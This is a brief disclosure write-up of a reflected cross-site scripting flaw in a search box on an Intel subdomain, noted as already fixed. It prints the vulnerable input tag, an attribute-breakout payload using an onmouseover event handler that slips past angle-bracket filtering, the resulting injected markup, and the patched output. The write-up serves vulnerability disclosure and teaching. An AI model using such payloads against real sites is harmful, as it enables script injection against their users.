XSS Bug on Intel Subdomain, Explained poc video
Here it is a XSS vulnerability on Intel subdomain. We could notice that it reflects our input contents when we submit something. However, nothing will be reflected when we submit which it contains the symbol "<" or ">".
XSS will be triggered on this line.
<input type="text" name="searchword" placeholder="Search" class="form-control input-lg" value="" placeholder="" autocomplete="off" />
When we submit this content :
hello" onmouseover=prompt(0) something="
This input tag will become the following stuff.
<input type="text" name="searchword" placeholder="Search" class="form-control input-lg" value="hello" onmouseover=prompt(0) something="" placeholder="" autocomplete="off" />
This bug have already been fixed:
<input type="text" name="searchword" placeholder="Search" class="form-control input-lg" value="hello" onmouseover prompt(0) something "" placeholder="" autocomplete="off" />
The result shows double quotes are replaced as "
, and "=" is just filtered.